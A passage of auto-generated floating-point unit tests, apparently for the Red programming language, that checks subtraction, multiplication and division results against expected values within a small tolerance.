--assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1182" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1183" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1184" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1185" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 7.69999999999988E+18 fat-k 1E-4 --test-- "float-auto-1186" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.22209094399999E+33 fat-k 1E-4 --test-- "float-auto-1187" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1188" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1189" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1190" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1191" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1192" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1193" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1194" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1195" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1196" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1197" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1198" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1199" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1200" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1201" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 4.61168601842739E+18 fat-k 1E-4 --test-- "float-auto-1202" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -4.6116860162799E+18 fat-k 1E-4 --test-- "float-auto-1203" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1204" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -6442450944.0 fat-k 1E-4 --test-- "float-auto-1205" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 15032385536.0 fat-k 1E-4 --test-- "float-auto-1206" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -10737418240.0 fat-k 1E-4 --test-- "float-auto-1207" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -265121435612086.0 fat-k 1E-4 --test-- "float-auto-1208" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -2.62442031860888E+42 fat-k 1E-4 --test-- "float-auto-1209" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -2.14748150051635E-35 fat-k 1E-4 --test-- "float-auto-1210" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -1.65356240896E+28 fat-k 1E-4 --test-- "float-auto-1211" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1212" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -4.6116860162799E+18 fat-k 1E-4 --test-- "float-auto-1213" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 4.61168601413242E+18 fat-k 1E-4 --test-- "float-auto-1214" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1215" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 6442450941.0 fat-k 1E-4 --test-- "float-auto-1216" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -15032385529.0 fat-k 1E-4 --test-- "float-auto-1217" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 10737418235.0 fat-k 1E-4 --test-- "float-auto-1218" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 265121435488630.0 fat-k 1E-4 --test-- "float-auto-1219" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 2.62442031738679E+42 fat-k 1E-4 --test-- "float-auto-1220" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 2.14748149951635E-35 fat-k 1E-4 --test-- "float-auto-1221" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 1.65356240819E+28 fat-k 1E-4 --test-- "float-auto-1222" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1223" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1224" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1225" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1226" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-1227" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-1228" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-1229" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-1230" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1231" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-1232" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1233" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1234" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -6442450944.0 fat-k 1E-4 --test-- "float-auto-1235" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 6442450941.0 fat-k 1E-4 --test-- "float-auto-1236" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-1237" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 9.0 fat-k 1E-4 --test-- "float-auto-1238" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -21.0 fat-k 1E-4 --test-- "float-auto-1239" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 15.0 fat-k 1E-4 --test-- "float-auto-1240" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 370370.367 fat-k 1E-4 --test-- "float-auto-1241" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 3.666272832E+33 fat-k 1E-4 --test-- "float-auto-1242" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 2.999997E-44 fat-k 1E-4 --test-- "float-auto-1243" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 2.31E+19 fat-k 1E-4 --test-- "float-auto-1244" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1245" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 15032385536.0 fat-k 1E-4 --test-- "float-auto-1246" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -15032385529.0 fat-k 1E-4 --test-- "float-auto-1247" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-1248" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -21.0 fat-k 1E-4 --test-- "float-auto-1249" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 49.0 fat-k 1E-4 --test-- "float-auto-1250" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -35.0 fat-k 1E-4 --test-- "float-auto-1251" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -864197.523 fat-k 1E-4 --test-- "float-auto-1252" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -8.554636608E+33 fat-k 1E-4 --test-- "float-auto-1253" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -6.999993E-44 fat-k 1E-4 --test-- "float-auto-1254" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -5.39E+19 fat-k 1E-4 --test-- "float-auto-1255" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1256" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -10737418240.0 fat-k 1E-4 --test-- "float-auto-1257" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 10737418235.0 fat-k 1E-4 --test-- "float-auto-1258" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-1259" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 15.0 fat-k 1E-4 --test-- "float-auto-1260" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -35.0 fat-k 1E-4 --test-- "float-auto-1261" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 25.0 fat-k 1E-4 --test-- "float-auto-1262" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 617283.945 fat-k 1E-4 --test-- "float-auto-1263" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 6.11045472E+33 fat-k 1E-4 --test-- "float-auto-1264" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 4.999995E-44 fat-k 1E-4 --test-- "float-auto-1265" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 3.85E+19 fat-k 1E-4 --test-- "float-auto-1266" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1267" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -265121435612086.0 fat-k 1E-4 --test-- "float-auto-1268" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 265121435488630.0 fat-k 1E-4 --test-- "float-auto-1269" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-1270" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 370370.367 fat-k 1E-4 --test-- "float-auto-1271" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -864197.523 fat-k 1E-4 --test-- "float-auto-1272" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 617283.945 fat-k 1E-4 --test-- "float-auto-1273" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 15241578750.1905 fat-k 1E-4 --test-- "float-auto-1274" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.50875423812219E+38 fat-k 1E-4 --test-- "float-auto-1275" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 1.23456665543211E-39 fat-k 1E-4 --test-- "float-auto-1276" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 9.506172753E+23 fat-k 1E-4 --test-- "float-auto-1277" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1278" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -2.62442031860888E+42 fat-k 1E-4 --test-- "float-auto-1279" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 2.62442031738679E+42 fat-k 1E-4 --test-- "float-auto-1280" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1281" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 3.666272832E+33 fat-k 1E-4 --test-- "float-auto-1282" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -8.554636608E+33 fat-k 1E-4 --test-- "float-auto-1283" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 6.11045472E+33 fat-k 1E-4 --test-- "float-auto-1284" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 1.50875423812219E+38 fat-k 1E-4 --test-- "float-auto-1285" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.49350627540681E+66 fat-k 1E-4 --test-- "float-auto-1286" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 1.22208972190906E-11 fat-k 1E-4 --test-- "float-auto-1287" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 9.4101002688E+51 fat-k 1E-4 --test-- "float-auto-1288" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1289" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -2.14748150051635E-35 fat-k 1E-4 --test-- "float-auto-1290" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 2.14748149951635E-35 fat-k 1E-4 --test-- "float-auto-1291" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-1292" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 2.999997E-44 fat-k 1E-4 --test-- "float-auto-1293" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -6.999993E-44 fat-k 1E-4 --test-- "float-auto-1294" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 4.999995E-44 fat-k 1E-4 --test-- "float-auto-1295" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 1.23456665543211E-39 fat-k 1E-4 --test-- "float-auto-1296" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.22208972190906E-11 fat-k 1E-4 --test-- "float-auto-1297" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 9.99998000001E-89 fat-k 1E-4 --test-- "float-auto-1298" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 7.6999923E-26 fat-k 1E-4 --test-- "float-auto-1299" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1300" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -1.65356240896E+28 fat-k 1E-4 --test-- "float-auto-1301" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 1.65356240819E+28 fat-k 1E-4 --test-- "float-auto-1302" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1303" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 2.31E+19 fat-k 1E-4 --test-- "float-auto-1304" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -5.39E+19 fat-k 1E-4 --test-- "float-auto-1305" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 3.85E+19 fat-k 1E-4 --test-- "float-auto-1306" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 9.506172753E+23 fat-k 1E-4 --test-- "float-auto-1307" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 9.4101002688E+51 fat-k 1E-4 --test-- "float-auto-1308" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 7.6999923E-26 fat-k 1E-4 --test-- "float-auto-1309" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 5.929E+37 fat-k 1E-4 --test-- "float-auto-1310" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1311" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1312" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1313" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1314" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1315" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1316" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1317" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1318" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1319" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1320" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1321" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -1.00000000046566 fat-k 1E-4 --test-- "float-auto-1322" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1323" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -715827882.666667 fat-k 1E-4 --test-- "float-auto-1324" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 306783378.285714 fat-k 1E-4 --test-- "float-auto-1325" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -429496729.6 fat-k 1E-4 --test-- "float-auto-1326" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -17394.617707091 fat-k 1E-4 --test-- "float-auto-1327" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -1.75722081776592E-24 fat-k 1E-4 --test-- "float-auto-1328" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -2.1474857954858E+53 fat-k 1E-4 --test-- "float-auto-1329" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -2.7889398025974E-10 fat-k 1E-4 --test-- "float-auto-1330" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -0.999999999534339 fat-k 1E-4 --test-- "float-auto-1331" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1332" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1333" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 715827882.333333 fat-k 1E-4 --test-- "float-auto-1334" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -306783378.142857 fat-k 1E-4 --test-- "float-auto-1335" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 429496729.4 fat-k 1E-4 --test-- "float-auto-1336" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 17394.617698991 fat-k 1E-4 --test-- "float-auto-1337" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.75722081694765E-24 fat-k 1E-4 --test-- "float-auto-1338" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 2.14748579448579E+53 fat-k 1E-4 --test-- "float-auto-1339" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 2.7889398012987E-10 fat-k 1E-4 --test-- "float-auto-1340" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 4.65661287307739E-10 fat-k 1E-4 --test-- "float-auto-1341" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -4.6566128752458E-10 fat-k 1E-4 --test-- "float-auto-1342" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1343" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -0.333333333333333 fat-k 1E-4 --test-- "float-auto-1344" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 0.142857142857143 fat-k 1E-4 --test-- "float-auto-1345" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -0.2 fat-k 1E-4 --test-- "float-auto-1346" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -8.10000007371E-6 fat-k 1E-4 --test-- "float-auto-1347" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -8.18269708084835E-34 fat-k 1E-4 --test-- "float-auto-1348" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -1.000001000001E+44 fat-k 1E-4 --test-- "float-auto-1349" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -1.2987012987013E-19 fat-k 1E-4 --test-- "float-auto-1350" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -1.39698386192322E-9 fat-k 1E-4 --test-- "float-auto-1351" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 1.39698386257374E-9 fat-k 1E-4 --test-- "float-auto-1352" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-1353" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1354" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -0.428571428571429 fat-k 1E-4 --test-- "float-auto-1355" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 0.6 fat-k 1E-4 --test-- "float-auto-1356" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 2.430000022113E-5 fat-k 1E-4 --test-- "float-auto-1357" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 2.4548091242545E-33 fat-k 1E-4 --test-- "float-auto-1358" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 3.000003000003E+44 fat-k 1E-4 --test-- "float-auto-1359" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 3.8961038961039E-19 fat-k 1E-4 --test-- "float-auto-1360" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 3.25962901115417E-9 fat-k 1E-4 --test-- "float-auto-1361" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -3.25962901267206E-9 fat-k 1E-4 --test-- "float-auto-1362" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-1363" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -2.33333333333333 fat-k 1E-4 --test-- "float-auto-1364" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1365" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -1.4 fat-k 1E-4 --test-- "float-auto-1366" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -5.670000051597E-5 fat-k 1E-4 --test-- "float-auto-1367" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -5.72788795659384E-33 fat-k 1E-4 --test-- "float-auto-1368" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -7.000007000007E+44 fat-k 1E-4 --test-- "float-auto-1369" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -9.09090909090909E-19 fat-k 1E-4 --test-- "float-auto-1370" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -2.3283064365387E-9 fat-k 1E-4 --test-- "float-auto-1371" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 2.3283064376229E-9 fat-k 1E-4 --test-- "float-auto-1372" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-1373" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 1.66666666666667 fat-k 1E-4 --test-- "float-auto-1374" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -0.714285714285714 fat-k 1E-4 --test-- "float-auto-1375" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1376" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 4.050000036855E-5 fat-k 1E-4 --test-- "float-auto-1377" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 4.09134854042417E-33 fat-k 1E-4 --test-- "float-auto-1378" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 5.000005000005E+44 fat-k 1E-4 --test-- "float-auto-1379" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 6.49350649350649E-19 fat-k 1E-4 --test-- "float-auto-1380" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -5.74890472926199E-5 fat-k 1E-4 --test-- "float-auto-1381" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 5.74890473193904E-5 fat-k 1E-4 --test-- "float-auto-1382" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i / fat-j 